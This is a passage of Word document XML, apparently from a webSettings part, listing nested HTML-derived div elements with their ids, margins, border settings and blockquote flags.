        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1883514497">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1885020157">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2021392483">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1885826702">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1886405058">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1886597146">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1886985328">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1887253543">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1888452326">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1889027978">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="178278742">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2030140728">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1701392817">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="26955797">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="single" w:sz="6" w:space="6" w:color="A7B2BA"/>
                <w:bottom w:val="single" w:sz="6" w:space="5" w:color="A7B2BA"/>
                <w:right w:val="single" w:sz="6" w:space="6" w:color="A7B2BA"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="356540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9760977">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1890725383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1891500719">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1893883384">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1894272629">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1896890250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1896963779">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1897352831">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1897815304">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1898324243">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="572545958">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="240"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="974869543">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1017584977">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="183634082">
                  <w:blockQuote w:val="1"/>
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="300"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="36" w:space="15" w:color="EEEEEE"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="697315319">
                  <w:blockQuote w:val="1"/>
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="300"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="single" w:sz="36" w:space="15" w:color="EEEEEE"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="872886460">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sChild>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1899240129">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1901745833">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1904487447">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1245187192">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1905607133">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1909030840">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1915505111">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1439370057">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1916014838">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1916430762">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1916894623">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1643315917">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1919175147">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1920753683">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1923558935">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1924996257">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1926723041">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1927573704">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1929384374">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="430785524">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="360"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="590435364">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1932426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5801131">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1585721032">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1915430804">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="539971849">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1511526728">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="439111214">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1479228084">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="120"/>
                                  <w:marBottom w:val="120"/>
                                  <w:divBdr>
